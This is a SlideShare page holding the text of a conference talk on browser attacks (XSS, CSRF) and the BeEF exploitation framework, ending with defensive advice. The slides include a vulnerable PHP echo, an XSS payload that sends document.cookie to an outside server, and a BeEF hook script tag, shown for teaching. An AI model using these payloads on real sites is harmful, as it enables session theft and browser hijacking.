SlideShare une entreprise Scribd logo

BeEF: The Browser Exploitation Framework

A
awiasecretary
Technologie
1  sur  85
Télécharger pour lire hors ligne
It’s 10pm, do you know where your browser is? Christian @xntrik Frichot 1 Hi - I’m Christian ..
2 SCARY
3 Cute ;)
Enhancing Lives 4 Why are we here?
I <3 U 5 And we lurve the Internet
>=] <3 U 6 But so do bad-guys
Online Banking 7
Online Bank Robbery 8 Way easier these days..
Online Communication 9
Online Romance 10
Online Heart Robbery 11 Way easier.
12 Sad?
13 Sadder!
Browsers & Web Apps 14 But this is what we’re talking about..
Browser 15 Browsers
Web Apps 16 Web apps
17 OVERVIEW
The Ubiquitous Web & its Imperfect Trust Model 18 1
Malicious Actors Do Malicious Things 19 2
You already deploy defences (even if you don’t know it) Let’s bolster them 20 3
Ubiquitous 21 The Internet is pervasive and ubiquitous
22 People who ‘support’ the ecosystem are multiplying
Lots of people Lots of browsers 23 Lots of attack surface
!eCommerce Commerce! 24 Why?
25 Attackers don’t care, just seeing victims.
26 But it’s broken
27 What does this mean?
28 So how is my mum meant to know that this doesn’t mean the same thing?? http://www.usablesecurity.org/papers/jackson.pdf
29 Yup .. a fake frame inside someone else’s site..
Domains are mixed 30
31 Traditional security models just don’t work in this new age.
Bell-LaPadula ? 32
Same Origin Policy 33 Closest we have?
34 In the end though .. The browser will do what the server says. The server will do what the browser says
It’s Mighty (confusing) 35 The browser is mighty - and it’s used by all of us ...
36 and it’s confusing..
So just how bad is the bad stuff the bad people do? 37
38 OWASP, the Open Web Application Security Project, try to categorise the top 10 riskiest web security weaknesses. Known as the OWASP Top 10 it’s a great resource.. www.owasp.org
Cross Site Scripting (XSS) 39 In the OWASP Top 10 this comes in at number 2, and they describe it as so: “XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content”
Server code: 1. Take ‘greeting’ parameter page.php?greeting=<input> 2. Dynamically print that out in the response <p><?php echo $_GET[‘greeting’] ?></p> 40
What if greeting was: <script>img=new Image();img.src='http:// frichot.com/nom.php? cookie='+document.cookie;</script> 41
Words < Picture < Moving Picture 42
Demo 43
44
Cross Site Request Forgery (CSRF) 45 CSRF comes in at number 5 in the OWASP Top 10.. described as: “Since browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.”
46
ING Direct 47 https://www.eecs.berkeley.edu/~daw/teaching/cs261-f11/reading/csrf.pdf 2008
Without prior knowledge of secret or random tokens 48
If you were online performing banking 49
And your browser rendered content from elsewhere 50
They could automatically transact your funds away 51
52
GET request to Add New Contact page POST request to add the contact POST request to confirm the new contact POST request to create payment to contact POST request to confirm payment 53
54
Samy Wanted Friends 55
56
This is lovely, but this is manual 57 This all seems very hands on..
http://beefproject.com 58 Let me introduce you to BeEF.... The Browser Exploitation Framework ..
59 The architecture looks a little bit like this.
60 Beef is currently made up of 3 main components: Core, Extensions & Modules http://img4.cookinglight.com/i/2009/01/0901p40f-beef-patty-m.jpg? 300:300
61 Firstly is the core.. http://www.imdb.com/media/rm1627756544/tt0298814
Hooking methods Central API for Extensions & Modules Filters Database models CORE Primary client- Ruby extensions side JS Server-side asset handling Web servicing 62 ! - The Core ! ! - Central API ! ! - Filters ! ! - Primary client-side javascript ! ! - Server-side asset handling and web servicing ! ! - Ruby extensions ! ! - Database models ! ! - Hooking methods to load and manage arbitrary extensions and command modules
Extensions 63 Extensions
Web UI XSSRays Console Proxy/Requester EXTENSIONS Demo pages Metasploit Event handling Browser initialisation 64
65 Command Modules http://www.mobiinformer.com/wp-content/uploads/2010/11/big_red_button.jpg
Recon Browser Persistence COMMAND MODULES Debugging Network Host Router Miscellaneous 66
Hooking Browsers • XSS • Social Engineering (i.e. tiny URL, or phishing via email) • Embedding the payload (think drive-by- download) • Maintaining persistence after already being hooked (think Tab BeEF Injection) 67
<script src="http://beefserver.com/hook.js"></script> 68 This is pretty much all you need.
Demo 69
70
71 You can defend yourself
www.OWASP.org 72 Have LOTS of material
Multiple angles (angels?) 73
74 As a minimum ..
Your Baseline, Your Appetite 75 Determine your appetite and baseline
Update Your Frameworks 76 Use the latest versions of your framework, Rails, Django, .NET (MVC)
Monitor http://www.ossec.net/ http://sucuri.net/ 77
Be Prepared http://tiny.cc/rubygemsresponse 78
Want Moar? 79
Dev Lifecycle + Security http://microsoft.com/sdl 80
Continuous Security 81
Brakeman http://brakemanscanner.org/docs/presentations/ 82
Twitter http://www.slideshare.net/xplodersuv/putting-your-robots- to-work-14901538 Mozilla https://air.mozilla.org/minion-automating-security-for- developers/ Facebook http://www.slideshare.net/mimeframe/ ruxcon-2012-15195589 83
You are not alone 84
Questions? 85 www.asteriskinfosec.com.au @asteriskinfosec @xntrik

Recommandé

BeEF
BeEFBeEF
BeEFAlexandraLacatus
 
Browser Exploitation Framework Tutorial
Browser Exploitation Framework TutorialBrowser Exploitation Framework Tutorial
Browser Exploitation Framework Tutorialimlaurel2
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
Browser Exploit Framework
Browser Exploit FrameworkBrowser Exploit Framework
Browser Exploit Frameworkn|u - The Open Security Community
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsKrzysztof Kotowicz
 
Hacking The World With Flash
Hacking The World With FlashHacking The World With Flash
Hacking The World With Flashjoepangus
 
Flashack
FlashackFlashack
Flashackn|u - The Open Security Community
 

Recommandé

BeEF
BeEFBeEF
BeEFAlexandraLacatus
 
Browser Exploitation Framework Tutorial
Browser Exploitation Framework TutorialBrowser Exploitation Framework Tutorial
Browser Exploitation Framework Tutorialimlaurel2
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
Browser Exploit Framework
Browser Exploit FrameworkBrowser Exploit Framework
Browser Exploit Frameworkn|u - The Open Security Community
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsKrzysztof Kotowicz
 
Hacking The World With Flash
Hacking The World With FlashHacking The World With Flash
Hacking The World With Flashjoepangus
 
Flashack
FlashackFlashack
Flashackn|u - The Open Security Community
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 n|u - The Open Security Community
 
Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruMichele Orru
 
Practice of AppSec .NET
Practice of AppSec .NETPractice of AppSec .NET
Practice of AppSec .NETMikhail Shcherbakov
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruMichele Orru
 
Selenium Webdriver pop up handling
Selenium Webdriver pop up handlingSelenium Webdriver pop up handling
Selenium Webdriver pop up handlingDestinationQA
 
Xss 101 by-sai-shanthan
Xss 101 by-sai-shanthanXss 101 by-sai-shanthan
Xss 101 by-sai-shanthanRaghunath G
 
The Future of Firefox and JavaScript
The Future of Firefox and JavaScriptThe Future of Firefox and JavaScript
The Future of Firefox and JavaScriptjeresig
 
Unifi securitybugs sep2013
Unifi securitybugs sep2013Unifi securitybugs sep2013
Unifi securitybugs sep2013testslidesha12
 
Web browsers
Web browsersWeb browsers
Web browsersmarianavega16
 
MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPressdsero
 
Web Hacking Intro
Web Hacking IntroWeb Hacking Intro
Web Hacking IntroAditya Kamat
 
تست وب اپ ها با سلنیوم - علیرضا عظیم زاده میلانی
تست وب اپ ها با سلنیوم - علیرضا عظیم زاده میلانیتست وب اپ ها با سلنیوم - علیرضا عظیم زاده میلانی
تست وب اپ ها با سلنیوم - علیرضا عظیم زاده میلانیirpycon
 
Selenium drivers
Selenium driversSelenium drivers
Selenium driversDestinationQA
 
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...Frédéric Harper
 
02 installation
02 installation02 installation
02 installationJadavsejal
 
What's new in vs 2010 sp1 for web developers
What's new in vs 2010 sp1 for web developersWhat's new in vs 2010 sp1 for web developers
What's new in vs 2010 sp1 for web developersAbhijit Jana
 
Implementing application security using the .net framework
Implementing application security using the .net frameworkImplementing application security using the .net framework
Implementing application security using the .net frameworkLalit Kale
 
Intro to Powershell
Intro to PowershellIntro to Powershell
Intro to PowershellDean Willson
 
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to Help
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to HelpTowards a More Secure, Reliable, and Performant Web: Tools / Approaches to Help
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to HelpStephen Donner
 
Karl Moyse, Knock, knock. Who's there?
Karl Moyse, Knock, knock. Who's there?Karl Moyse, Knock, knock. Who's there?
Karl Moyse, Knock, knock. Who's there?awiasecretary
 
Web Forms People Don't Hate
Web Forms People Don't HateWeb Forms People Don't Hate
Web Forms People Don't Hatecliener
 

Contenu connexe

Tendances

Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruMichele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruMichele Orru
 
Selenium Webdriver pop up handling
Selenium Webdriver pop up handlingSelenium Webdriver pop up handling
Selenium Webdriver pop up handlingDestinationQA
 
Xss 101 by-sai-shanthan
Xss 101 by-sai-shanthanXss 101 by-sai-shanthan
Xss 101 by-sai-shanthanRaghunath G
 
The Future of Firefox and JavaScript
The Future of Firefox and JavaScriptThe Future of Firefox and JavaScript
The Future of Firefox and JavaScriptjeresig
 
Unifi securitybugs sep2013
Unifi securitybugs sep2013Unifi securitybugs sep2013
Unifi securitybugs sep2013testslidesha12
 
MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPressdsero
 
تست وب اپ ها با سلنیوم - علیرضا عظیم زاده میلانی
تست وب اپ ها با سلنیوم - علیرضا عظیم زاده میلانیتست وب اپ ها با سلنیوم - علیرضا عظیم زاده میلانی
تست وب اپ ها با سلنیوم - علیرضا عظیم زاده میلانیirpycon
 
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...Frédéric Harper
 
02 installation
02 installation02 installation
02 installationJadavsejal
 
What's new in vs 2010 sp1 for web developers
What's new in vs 2010 sp1 for web developersWhat's new in vs 2010 sp1 for web developers
What's new in vs 2010 sp1 for web developersAbhijit Jana
 
Implementing application security using the .net framework
Implementing application security using the .net frameworkImplementing application security using the .net framework
Implementing application security using the .net frameworkLalit Kale
 
Intro to Powershell
Intro to PowershellIntro to Powershell
Intro to PowershellDean Willson
 
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to Help
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to HelpTowards a More Secure, Reliable, and Performant Web: Tools / Approaches to Help
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to HelpStephen Donner
 

Tendances (20)

Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014
 
Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orru
 
Practice of AppSec .NET
Practice of AppSec .NETPractice of AppSec .NET
Practice of AppSec .NET
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEF
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorru
 
Selenium Webdriver pop up handling
Selenium Webdriver pop up handlingSelenium Webdriver pop up handling
Selenium Webdriver pop up handling
 
Xss 101 by-sai-shanthan
Xss 101 by-sai-shanthanXss 101 by-sai-shanthan
Xss 101 by-sai-shanthan
 
The Future of Firefox and JavaScript
The Future of Firefox and JavaScriptThe Future of Firefox and JavaScript
The Future of Firefox and JavaScript
 
Unifi securitybugs sep2013
Unifi securitybugs sep2013Unifi securitybugs sep2013
Unifi securitybugs sep2013
 
Web browsers
Web browsersWeb browsers
Web browsers
 
MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPress
 
Web Hacking Intro
Web Hacking IntroWeb Hacking Intro
Web Hacking Intro
 
تست وب اپ ها با سلنیوم - علیرضا عظیم زاده میلانی
تست وب اپ ها با سلنیوم - علیرضا عظیم زاده میلانیتست وب اپ ها با سلنیوم - علیرضا عظیم زاده میلانی
تست وب اپ ها با سلنیوم - علیرضا عظیم زاده میلانی
 
Selenium drivers
Selenium driversSelenium drivers
Selenium drivers
 
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
 
02 installation
02 installation02 installation
02 installation
 
What's new in vs 2010 sp1 for web developers
What's new in vs 2010 sp1 for web developersWhat's new in vs 2010 sp1 for web developers
What's new in vs 2010 sp1 for web developers
 
Implementing application security using the .net framework
Implementing application security using the .net frameworkImplementing application security using the .net framework
Implementing application security using the .net framework
 
Intro to Powershell
Intro to PowershellIntro to Powershell
Intro to Powershell
 
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to Help
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to HelpTowards a More Secure, Reliable, and Performant Web: Tools / Approaches to Help
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to Help
 

En vedette

Karl Moyse, Knock, knock. Who's there?
Karl Moyse, Knock, knock. Who's there?Karl Moyse, Knock, knock. Who's there?
Karl Moyse, Knock, knock. Who's there?awiasecretary
 
Web Forms People Don't Hate
Web Forms People Don't HateWeb Forms People Don't Hate
Web Forms People Don't Hatecliener
 
Give Your JavaScript Apps Some Spine
Give Your JavaScript Apps Some SpineGive Your JavaScript Apps Some Spine
Give Your JavaScript Apps Some SpineLachlan Hardy
 
Jo lim, Anyone for .tennis?
Jo lim, Anyone for .tennis?Jo lim, Anyone for .tennis?
Jo lim, Anyone for .tennis?awiasecretary
 

En vedette (6)

Karl Moyse, Knock, knock. Who's there?
Karl Moyse, Knock, knock. Who's there?Karl Moyse, Knock, knock. Who's there?
Karl Moyse, Knock, knock. Who's there?
 
Web Forms People Don't Hate
Web Forms People Don't HateWeb Forms People Don't Hate
Web Forms People Don't Hate
 
Give Your JavaScript Apps Some Spine
Give Your JavaScript Apps Some SpineGive Your JavaScript Apps Some Spine
Give Your JavaScript Apps Some Spine
 
Bret treasure
Bret treasureBret treasure
Bret treasure
 
Jo lim, Anyone for .tennis?
Jo lim, Anyone for .tennis?Jo lim, Anyone for .tennis?
Jo lim, Anyone for .tennis?
 
Notes from the Edge
Notes from the EdgeNotes from the Edge
Notes from the Edge
 

Similaire à BeEF: The Browser Exploitation Framework

Crash Course In Brain Surgery
Crash Course In Brain SurgeryCrash Course In Brain Surgery
Crash Course In Brain Surgerymorisson
 
SecTor '09 - When Web 2.0 Attacks!
SecTor '09 - When Web 2.0 Attacks!SecTor '09 - When Web 2.0 Attacks!
SecTor '09 - When Web 2.0 Attacks!Rafal Los
 
The Ultimate Deobfuscator - ToorCON San Diego 2008
The Ultimate Deobfuscator - ToorCON San Diego 2008The Ultimate Deobfuscator - ToorCON San Diego 2008
The Ultimate Deobfuscator - ToorCON San Diego 2008Stephan Chenette
 
10 Things You Probably Didn't Know About Plone
10 Things You Probably Didn't Know About Plone10 Things You Probably Didn't Know About Plone
10 Things You Probably Didn't Know About PloneJazkarta, Inc.
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?Graham Charters
 
Banking malware zeu s zombies are using in online banking theft.
Banking malware zeu s zombies are using in online banking theft.Banking malware zeu s zombies are using in online banking theft.
Banking malware zeu s zombies are using in online banking theft.Nahidul Kibria
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...Aditya K Sood
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Aditya K Sood
 
10 Things About Plone - Software Freedom Day 2008
10 Things About Plone - Software Freedom Day 200810 Things About Plone - Software Freedom Day 2008
10 Things About Plone - Software Freedom Day 2008Jazkarta, Inc.
 
Teaching Elephants to Dance (Federal Audience): A Developer's Journey to Digi...
Teaching Elephants to Dance (Federal Audience): A Developer's Journey to Digi...Teaching Elephants to Dance (Federal Audience): A Developer's Journey to Digi...
Teaching Elephants to Dance (Federal Audience): A Developer's Journey to Digi...Burr Sutter
 
Being Amazon for Software Developers - IDE 2.0: Crowdsourcing mal anders #Jav...
Being Amazon for Software Developers - IDE 2.0: Crowdsourcing mal anders #Jav...Being Amazon for Software Developers - IDE 2.0: Crowdsourcing mal anders #Jav...
Being Amazon for Software Developers - IDE 2.0: Crowdsourcing mal anders #Jav...Marcel Bruch
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2ShapeBlue
 
LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewRobert Herjavec
 
Douglas - Real JavaScript
Douglas - Real JavaScriptDouglas - Real JavaScript
Douglas - Real JavaScriptd0nn9n
 
Cryptojacking - by Vishwaraj101
Cryptojacking - by Vishwaraj101Cryptojacking - by Vishwaraj101
Cryptojacking - by Vishwaraj101v_raj
 
2016 - 10 questions you should answer before building a new microservice
2016 - 10 questions you should answer before building a new microservice2016 - 10 questions you should answer before building a new microservice
2016 - 10 questions you should answer before building a new microservicedevopsdaysaustin
 

Similaire à BeEF: The Browser Exploitation Framework (20)

Advanced Malware Analysis
Advanced Malware AnalysisAdvanced Malware Analysis
Advanced Malware Analysis
 
Crash Course In Brain Surgery
Crash Course In Brain SurgeryCrash Course In Brain Surgery
Crash Course In Brain Surgery
 
SecTor '09 - When Web 2.0 Attacks!
SecTor '09 - When Web 2.0 Attacks!SecTor '09 - When Web 2.0 Attacks!
SecTor '09 - When Web 2.0 Attacks!
 
The Ultimate Deobfuscator - ToorCON San Diego 2008
The Ultimate Deobfuscator - ToorCON San Diego 2008The Ultimate Deobfuscator - ToorCON San Diego 2008
The Ultimate Deobfuscator - ToorCON San Diego 2008
 
10 Things You Probably Didn't Know About Plone
10 Things You Probably Didn't Know About Plone10 Things You Probably Didn't Know About Plone
10 Things You Probably Didn't Know About Plone
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
 
Banking malware zeu s zombies are using in online banking theft.
Banking malware zeu s zombies are using in online banking theft.Banking malware zeu s zombies are using in online banking theft.
Banking malware zeu s zombies are using in online banking theft.
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
 
10 Things About Plone - Software Freedom Day 2008
10 Things About Plone - Software Freedom Day 200810 Things About Plone - Software Freedom Day 2008
10 Things About Plone - Software Freedom Day 2008
 
Teaching Elephants to Dance (Federal Audience): A Developer's Journey to Digi...
Teaching Elephants to Dance (Federal Audience): A Developer's Journey to Digi...Teaching Elephants to Dance (Federal Audience): A Developer's Journey to Digi...
Teaching Elephants to Dance (Federal Audience): A Developer's Journey to Digi...
 
Being Amazon for Software Developers - IDE 2.0: Crowdsourcing mal anders #Jav...
Being Amazon for Software Developers - IDE 2.0: Crowdsourcing mal anders #Jav...Being Amazon for Software Developers - IDE 2.0: Crowdsourcing mal anders #Jav...
Being Amazon for Software Developers - IDE 2.0: Crowdsourcing mal anders #Jav...
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2
 
LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR Overview
 
Fireshark - Brucon 2010
Fireshark - Brucon 2010Fireshark - Brucon 2010
Fireshark - Brucon 2010
 
Douglas - Real JavaScript
Douglas - Real JavaScriptDouglas - Real JavaScript
Douglas - Real JavaScript
 
Cryptojacking - by Vishwaraj101
Cryptojacking - by Vishwaraj101Cryptojacking - by Vishwaraj101
Cryptojacking - by Vishwaraj101
 
2016 - 10 questions you should answer before building a new microservice
2016 - 10 questions you should answer before building a new microservice2016 - 10 questions you should answer before building a new microservice
2016 - 10 questions you should answer before building a new microservice
 

Dernier

04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 

Dernier (20)

04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
